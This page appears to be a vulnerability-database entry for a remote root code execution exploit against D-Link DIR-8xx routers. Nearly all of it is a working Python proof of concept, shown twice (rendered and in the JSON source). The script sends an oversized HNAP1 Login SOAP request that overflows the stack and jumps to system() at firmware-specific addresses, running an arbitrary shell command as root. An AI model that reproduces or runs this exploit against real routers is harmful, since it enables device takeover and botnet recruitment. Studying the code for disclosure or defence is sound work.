Search...

D-Link DIR-8xx Routers - Root Remote Code Execution

2017-09-12T00:00:00

ID EXPLOITPACK:B59F82D896B369195499A094496B18F0
Type exploitpack
Reporter embedi
Modified 2017-09-12T00:00:00

Description

D-Link DIR-8xx Routers - Root Remote Code Execution

                                        
                                            # Due to error in hnap protocol implementation we can overflow stack and execute any sh commands under root priviliges.
# E-DB Note: https://embedi.com/blog/enlarge-your-botnet-top-d-link-routers-dir8xx-d-link-routers-cruisin-bruisin
# E-DB Note: https://github.com/embedi/DIR8xx_PoC/blob/b0609957692f71da48fd7de28be0516b589187c3/hnap.py

import requests as rq
import struct

IP = "192.168.0.1"
PORT = "80"
# Can differ in different version of routers and versions of firmware
# SYSTEM_ADDRESS = 0x1B570 # DIR-890L_REVA_FIRMWARE_PATCH_v1.11B02.BETA01
SYSTEM_ADDRESS = 0x1B50C	# DIR-890L_REVA_FIRMWARE_1.10.B07 

def _str(address):
    return struct.pack("&lt;I", address) if address &gt; 0 else struct.pack("&lt;i", address)

url = 'http://{ip}:{port}/HNAP1/'.format(ip=IP, port=PORT)

headers_text = {
    'SOAPACTION' : 'http://purenetworks.com/HNAP1/Login',
    'CONTENT-TYPE' : 'text/html'
}
payload = b"echo 1 &gt; /tmp/hacked;"

print(rq.post(url, data=b"&lt;Action&gt;" + payload + b"A" * (0x400 - len(payload)) + _str(-1) + b"C" * 0x14 + _str(SYSTEM_ADDRESS)[0:3] + b"&lt;/Action&gt;", headers=headers_text).text)

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:04:11", "references": [], "description": "\nD-Link DIR-8xx Routers - Root Remote Code Execution", "edition": 1, "reporter": "embedi", "exploitpack": {"type": "webapps", "platform": "hardware"}, "published": "2017-09-12T00:00:00", "title": "D-Link DIR-8xx Routers - Root Remote Code Execution", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:11", "rev": 2}, "score": {"value": 0.8, "vector": "NONE", "modified": "2020-04-01T19:04:11", "rev": 2}, "vulnersScore": 0.8}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-09-12T00:00:00", "id": "EXPLOITPACK:B59F82D896B369195499A094496B18F0", "href": "", "viewCount": 1, "sourceData": "# Due to error in hnap protocol implementation we can overflow stack and execute any sh commands under root priviliges.\n# E-DB Note: https://embedi.com/blog/enlarge-your-botnet-top-d-link-routers-dir8xx-d-link-routers-cruisin-bruisin\n# E-DB Note: https://github.com/embedi/DIR8xx_PoC/blob/b0609957692f71da48fd7de28be0516b589187c3/hnap.py\n\nimport requests as rq\nimport struct\n\nIP = \"192.168.0.1\"\nPORT = \"80\"\n# Can differ in different version of routers and versions of firmware\n# SYSTEM_ADDRESS = 0x1B570 # DIR-890L_REVA_FIRMWARE_PATCH_v1.11B02.BETA01\nSYSTEM_ADDRESS = 0x1B50C\t# DIR-890L_REVA_FIRMWARE_1.10.B07 \n\ndef _str(address):\n return struct.pack(\"<I\", address) if address > 0 else struct.pack(\"<i\", address)\n\nurl = 'http://{ip}:{port}/HNAP1/'.format(ip=IP, port=PORT)\n\nheaders_text = {\n 'SOAPACTION' : 'http://purenetworks.com/HNAP1/Login',\n 'CONTENT-TYPE' : 'text/html'\n}\npayload = b\"echo 1 > /tmp/hacked;\"\n\nprint(rq.post(url, data=b\"<Action>\" + payload + b\"A\" * (0x400 - len(payload)) + _str(-1) + b\"C\" * 0x14 + _str(SYSTEM_ADDRESS)[0:3] + b\"</Action>\", headers=headers_text).text)", "cvss": {"score": 0.0, "vector": "NONE"}}